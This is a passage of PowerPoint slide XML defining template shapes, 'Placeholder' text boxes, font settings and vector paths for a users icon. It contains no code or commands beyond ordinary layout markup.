              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Rectangle 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3CD6734-32F8-6D20-79DB-73A76A1903D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="5035207"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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21" name="Rectangle 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04710635-A86B-2747-4329-754E9E631E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="5470849"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Rectangle 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726C1C3F-54A3-4634-602F-2EC71FBFF664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="5035207"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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24" name="Rectangle 123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E074249-D0CE-0DD9-4953-51C1435C572F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9167688" y="3782726"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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A83EAC5E-14BC-A9DB-8BC1-D9C9904F3CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9167688" y="3347084"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Rectangle 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2BB5FC-0385-E6C3-C315-9CEF4F427137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902919" y="3782726"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Rectangle 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ABA0EE3-C53A-2DEC-0E5C-2D2669E47376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902919" y="3347084"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Placeholder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Graphic 24" descr="Users outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D07FB8-04C5-F6E9-2447-6DD1061E6495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5563578" y="3464400"/>
            <a:ext cx="1064847" cy="646503"/>
            <a:chOff x="5694438" y="3533089"/>
            <a:chExt cx="800035" cy="485727"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform: Shape 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F34531-7703-F8D8-E423-BD638E4C6A72}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="57800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DB14844-200C-08DE-F12B-1AA7898EAEDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="62372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BE11DB7-4985-F44F-B4B2-89B4BAE5AC0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6205387" y="3725351"/>
              <a:ext cx="289085" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 269072 w 289085"/>
                <a:gd name="connsiteY0" fmla="*/ 50473 h 161925"/>
                <a:gd name="connsiteX1" fmla="*/ 186709 w 289085"/>
                <a:gd name="connsiteY1" fmla="*/ 11125 h 161925"/>
                <a:gd name="connsiteX2" fmla="*/ 117624 w 289085"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 161925"/>
                <a:gd name="connsiteX3" fmla="*/ 48749 w 289085"/>
                <a:gd name="connsiteY3" fmla="*/ 11078 h 161925"/>
                <a:gd name="connsiteX4" fmla="*/ 3124 w 289085"/>
                <a:gd name="connsiteY4" fmla="*/ 28461 h 161925"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 289085"/>
                <a:gd name="connsiteY5" fmla="*/ 51702 h 161925"/>
                <a:gd name="connsiteX6" fmla="*/ 54083 w 289085"/>
                <a:gd name="connsiteY6" fmla="*/ 29356 h 161925"/>
                <a:gd name="connsiteX7" fmla="*/ 117624 w 289085"/>
                <a:gd name="connsiteY7" fmla="*/ 19050 h 161925"/>
                <a:gd name="connsiteX8" fmla="*/ 181861 w 289085"/>
                <a:gd name="connsiteY8" fmla="*/ 29528 h 161925"/>
                <a:gd name="connsiteX9" fmla="*/ 257223 w 289085"/>
                <a:gd name="connsiteY9" fmla="*/ 65389 h 161925"/>
                <a:gd name="connsiteX10" fmla="*/ 258042 w 289085"/>
                <a:gd name="connsiteY10" fmla="*/ 65999 h 161925"/>
                <a:gd name="connsiteX11" fmla="*/ 270024 w 289085"/>
                <a:gd name="connsiteY11" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX12" fmla="*/ 270024 w 289085"/>
                <a:gd name="connsiteY12" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX13" fmla="*/ 289074 w 289085"/>
                <a:gd name="connsiteY13" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX14" fmla="*/ 289074 w 289085"/>
                <a:gd name="connsiteY14" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX15" fmla="*/ 269072 w 289085"/>
                <a:gd name="connsiteY15" fmla="*/ 5047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085" h="161925">
                  <a:moveTo>
                    <a:pt x="269072" y="50473"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="244794" y="31541"/>
                    <a:pt x="216691" y="18115"/>
                    <a:pt x="186709" y="11125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164264" y="4422"/>
                    <a:pt x="141039" y="682"/>
                    <a:pt x="117624" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94224" y="24"/>
                    <a:pt x="70976" y="3763"/>
                    <a:pt x="48749" y="11078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32945" y="15169"/>
                    <a:pt x="17644" y="20999"/>
                    <a:pt x="3124" y="28461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2891" y="36295"/>
                    <a:pt x="1844" y="44084"/>
                    <a:pt x="0" y="51702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16938" y="41851"/>
                    <a:pt x="35131" y="34335"/>
                    <a:pt x="54083" y="29356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74593" y="22617"/>
                    <a:pt x="96035" y="19140"/>
                    <a:pt x="117624" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139399" y="19752"/>
                    <a:pt x="160992" y="23273"/>
                    <a:pt x="181861" y="29528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209299" y="35836"/>
                    <a:pt x="235021" y="48077"/>
                    <a:pt x="257223" y="65389"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="258042" y="65999"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="265876" y="71647"/>
                    <a:pt x="270372" y="80836"/>
                    <a:pt x="270024" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="270024" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289074" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289074" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="289422" y="74665"/>
                    <a:pt x="281936" y="59690"/>
                    <a:pt x="269072" y="50473"/>
                  </a:cubicBezTo>
                  <a:close/>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AA141D1-1FE3-C54B-FF15-6FB56E0E8592}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5694438" y="3725351"/>
              <a:ext cx="288597" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 288598 w 288597"/>
                <a:gd name="connsiteY0" fmla="*/ 50225 h 161925"/>
                <a:gd name="connsiteX1" fmla="*/ 285740 w 288597"/>
                <a:gd name="connsiteY1" fmla="*/ 27289 h 161925"/>
                <a:gd name="connsiteX2" fmla="*/ 240440 w 288597"/>
                <a:gd name="connsiteY2" fmla="*/ 11097 h 161925"/>
                <a:gd name="connsiteX3" fmla="*/ 171374 w 288597"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 161925"/>
                <a:gd name="connsiteX4" fmla="*/ 102499 w 288597"/>
                <a:gd name="connsiteY4" fmla="*/ 11078 h 161925"/>
                <a:gd name="connsiteX5" fmla="*/ 19564 w 288597"/>
                <a:gd name="connsiteY5" fmla="*/ 50787 h 161925"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 288597"/>
                <a:gd name="connsiteY6" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 288597"/>
                <a:gd name="connsiteY7" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX8" fmla="*/ 19050 w 288597"/>
                <a:gd name="connsiteY8" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX9" fmla="*/ 19050 w 288597"/>
                <a:gd name="connsiteY9" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX10" fmla="*/ 31128 w 288597"/>
                <a:gd name="connsiteY10" fmla="*/ 65932 h 161925"/>
                <a:gd name="connsiteX11" fmla="*/ 107871 w 288597"/>
                <a:gd name="connsiteY11" fmla="*/ 29356 h 161925"/>
                <a:gd name="connsiteX12" fmla="*/ 171374 w 288597"/>
                <a:gd name="connsiteY12" fmla="*/ 19050 h 161925"/>
                <a:gd name="connsiteX13" fmla="*/ 235610 w 288597"/>
                <a:gd name="connsiteY13" fmla="*/ 29528 h 161925"/>
                <a:gd name="connsiteX14" fmla="*/ 288598 w 288597"/>
                <a:gd name="connsiteY14" fmla="*/ 502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597" h="161925">
                  <a:moveTo>
                    <a:pt x="288598" y="50225"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="286864" y="42698"/>
                    <a:pt x="285906" y="35012"/>
                    <a:pt x="285740" y="27289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="271205" y="20426"/>
                    <a:pt x="256032" y="15003"/>
                    <a:pt x="240440" y="11097"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218000" y="4405"/>
                    <a:pt x="194781" y="674"/>
                    <a:pt x="171374" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147974" y="24"/>
                    <a:pt x="124726" y="3763"/>
                    <a:pt x="102499" y="11078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72686" y="19206"/>
                    <a:pt x="44588" y="32659"/>
                    <a:pt x="19564" y="50787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7241" y="60272"/>
                    <a:pt x="15" y="74937"/>
                    <a:pt x="0" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19068" y="80877"/>
                    <a:pt x="23526" y="71813"/>
                    <a:pt x="31128" y="65932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54306" y="49233"/>
                    <a:pt x="80301" y="36843"/>
                    <a:pt x="107871" y="29356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128369" y="22621"/>
                    <a:pt x="149798" y="19143"/>
                    <a:pt x="171374" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193149" y="19752"/>
                    <a:pt x="214741" y="23274"/>
                    <a:pt x="235610" y="29528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254108" y="34061"/>
                    <a:pt x="271924" y="41021"/>
                    <a:pt x="288598" y="50225"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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6FA5B1C-DD6A-7B68-2568-C1AA3870CDC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5922962" y="3856892"/>
              <a:ext cx="342911" cy="161925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 322898 w 342911"/>
                <a:gd name="connsiteY0" fmla="*/ 50482 h 161925"/>
                <a:gd name="connsiteX1" fmla="*/ 240535 w 342911"/>
                <a:gd name="connsiteY1" fmla="*/ 11135 h 161925"/>
                <a:gd name="connsiteX2" fmla="*/ 171450 w 342911"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 161925"/>
                <a:gd name="connsiteX3" fmla="*/ 102594 w 342911"/>
                <a:gd name="connsiteY3" fmla="*/ 11078 h 161925"/>
                <a:gd name="connsiteX4" fmla="*/ 19660 w 342911"/>
                <a:gd name="connsiteY4" fmla="*/ 50787 h 161925"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 342911"/>
                <a:gd name="connsiteY5" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 342911"/>
                <a:gd name="connsiteY6" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX7" fmla="*/ 19050 w 342911"/>
                <a:gd name="connsiteY7" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX8" fmla="*/ 19050 w 342911"/>
                <a:gd name="connsiteY8" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX9" fmla="*/ 31137 w 342911"/>
                <a:gd name="connsiteY9" fmla="*/ 65932 h 161925"/>
                <a:gd name="connsiteX10" fmla="*/ 107871 w 342911"/>
                <a:gd name="connsiteY10" fmla="*/ 29356 h 161925"/>
                <a:gd name="connsiteX11" fmla="*/ 171450 w 342911"/>
                <a:gd name="connsiteY11" fmla="*/ 19050 h 161925"/>
                <a:gd name="connsiteX12" fmla="*/ 235696 w 342911"/>
                <a:gd name="connsiteY12" fmla="*/ 29527 h 161925"/>
                <a:gd name="connsiteX13" fmla="*/ 311048 w 342911"/>
                <a:gd name="connsiteY13" fmla="*/ 65380 h 161925"/>
                <a:gd name="connsiteX14" fmla="*/ 311868 w 342911"/>
                <a:gd name="connsiteY14" fmla="*/ 65989 h 161925"/>
                <a:gd name="connsiteX15" fmla="*/ 323850 w 342911"/>
                <a:gd name="connsiteY15" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX16" fmla="*/ 323850 w 342911"/>
                <a:gd name="connsiteY16" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX17" fmla="*/ 342900 w 342911"/>
                <a:gd name="connsiteY17" fmla="*/ 161925 h 161925"/>
                <a:gd name="connsiteX18" fmla="*/ 342900 w 342911"/>
                <a:gd name="connsiteY18" fmla="*/ 90488 h 161925"/>
                <a:gd name="connsiteX19" fmla="*/ 322898 w 342911"/>
                <a:gd name="connsiteY19" fmla="*/ 50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11" h="161925">
                  <a:moveTo>
                    <a:pt x="322898" y="50482"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="298622" y="31548"/>
                    <a:pt x="270518" y="18121"/>
                    <a:pt x="240535" y="11135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218089" y="4433"/>
                    <a:pt x="194864" y="691"/>
                    <a:pt x="171450" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148057" y="23"/>
                    <a:pt x="124815" y="3762"/>
                    <a:pt x="102594" y="11078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72779" y="19201"/>
                    <a:pt x="44681" y="32654"/>
                    <a:pt x="19660" y="50787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7297" y="60250"/>
                    <a:pt x="33" y="74919"/>
                    <a:pt x="0" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19050" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="19067" y="80874"/>
                    <a:pt x="23530" y="71809"/>
                    <a:pt x="31137" y="65932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54310" y="49229"/>
                    <a:pt x="80303" y="36839"/>
                    <a:pt x="107871" y="29356"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128393" y="22613"/>
                    <a:pt x="149848" y="19136"/>
                    <a:pt x="171450" y="19050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193229" y="19748"/>
                    <a:pt x="214824" y="23270"/>
                    <a:pt x="235696" y="29527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263132" y="35827"/>
                    <a:pt x="288853" y="48065"/>
                    <a:pt x="311048" y="65380"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="311868" y="65989"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="319704" y="71641"/>
                    <a:pt x="324199" y="80833"/>
                    <a:pt x="323850" y="90488"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="323850" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="161925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="90488"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="343245" y="74668"/>
                    <a:pt x="335760" y="59698"/>
                    <a:pt x="322898" y="50482"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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2F99B7B-4120-18CC-C1AE-C003DD21B6D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6008687" y="366462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50 h 171450"/>
                <a:gd name="connsiteX6" fmla="*/ 152400 w 171450"/>
                <a:gd name="connsiteY6" fmla="*/ 85725 h 171450"/>
                <a:gd name="connsiteX7" fmla="*/ 85725 w 171450"/>
                <a:gd name="connsiteY7" fmla="*/ 152400 h 171450"/>
                <a:gd name="connsiteX8" fmla="*/ 19050 w 171450"/>
                <a:gd name="connsiteY8" fmla="*/ 85725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50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122549" y="19050"/>
                    <a:pt x="152400" y="48901"/>
                    <a:pt x="152400" y="85725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152400" y="122549"/>
                    <a:pt x="122549" y="152400"/>
                    <a:pt x="85725" y="152400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48901" y="152400"/>
                    <a:pt x="19050" y="122549"/>
                    <a:pt x="19050" y="85725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19077" y="48904"/>
                    <a:pt x="48904" y="19055"/>
                    <a:pt x="85725" y="19002"/>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686416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hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7466887" y="4650414"/>
            <a:ext cx="2838343" cy="609282"/>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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-UY" sz="2398" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="7401880">
            <a:off x="5371515" y="1595931"/>
            <a:ext cx="1843715" cy="742564"/>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1218621">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2398">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1059955" y="2720295"/>
            <a:ext cx="4322294" cy="3576973"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="AutoShape 3"/>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4" name="Freeform 5"/>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5" name="Freeform 6"/>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6" name="Freeform 7"/>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7" name="Freeform 8"/>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28" name="Freeform 9"/>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9" name="Oval 10"/>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30" name="Oval 11"/>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FD749992-695D-5CB1-AFDC-03B4DBF8E1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273164" y="2940411"/>
            <a:ext cx="3816131" cy="2179448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21611119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0957-8F62-41FD-BEF7-E5A40457B7C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
